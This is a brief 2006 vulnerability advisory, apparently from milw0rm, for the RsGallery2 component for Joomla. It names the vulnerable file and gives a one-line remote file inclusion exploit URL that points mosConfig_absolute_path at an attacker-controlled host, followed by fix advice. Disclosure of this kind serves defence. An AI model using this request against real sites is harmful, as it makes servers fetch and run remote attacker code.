50 lines
No EOL
1.1 KiB
Text
50 lines
No EOL
1.1 KiB
Text
RsGallery2 for Joomla
|
|
---------------------------------------------------------------------------
|
|
|
|
Discovered: marriottvn
|
|
Remote : Yes
|
|
Level : High
|
|
|
|
---------------------------------------------------------------------------
|
|
Affected software description :
|
|
|
|
Application : RsGallery2
|
|
version : latest version [ 1.11.2 ]
|
|
Description: component for joomla
|
|
URL: http://rsdev.nl
|
|
|
|
----------------------------------------------------------------------------
|
|
|
|
Vulnerable file :
|
|
|
|
rsgallery2.html.php
|
|
|
|
----------------------------------------------------------------------------
|
|
|
|
Exploit:
|
|
|
|
http://[sitepath]/[joomlapath]/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://[attacker]
|
|
|
|
----------------------------------------------------------------------------
|
|
|
|
Fix:
|
|
|
|
1.Declare variabel $mosConfig_absolute_path
|
|
|
|
or
|
|
|
|
2.Add into the top function:
|
|
|
|
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
|
|
|
|
----------------------------------------------------------------------------
|
|
|
|
Contact:
|
|
|
|
Nick: marriottvn
|
|
E-mail: i_love_lonely_girl[at]yahoo.com
|
|
Web: http://vnsecurity.com
|
|
|
|
Greetz to: VnRekcah
|
|
|
|
# milw0rm.com [2006-06-28] |